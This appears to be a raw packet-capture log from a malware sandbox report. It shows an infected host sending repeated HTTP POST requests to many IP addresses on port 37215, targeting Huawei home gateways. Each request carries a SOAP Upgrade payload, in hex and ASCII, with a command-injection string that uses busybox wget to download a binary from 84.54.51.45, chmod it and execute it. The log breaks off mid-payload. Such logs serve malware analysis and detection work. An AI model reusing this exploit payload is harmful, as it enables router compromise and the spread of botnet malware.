                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1865192.168.2.155684041.185.0.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466598988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1866192.168.2.155670041.217.146.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466631889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1867192.168.2.155562241.34.235.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.466650963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1868192.168.2.153491841.184.190.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.598510981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1869192.168.2.155260241.1.54.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.598532915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1870192.168.2.154963441.23.186.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599200010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1871192.168.2.154004641.221.77.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599214077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1872192.168.2.155439441.189.211.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599232912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1873192.168.2.155652041.105.32.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599232912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1874192.168.2.153705441.163.86.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599236012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 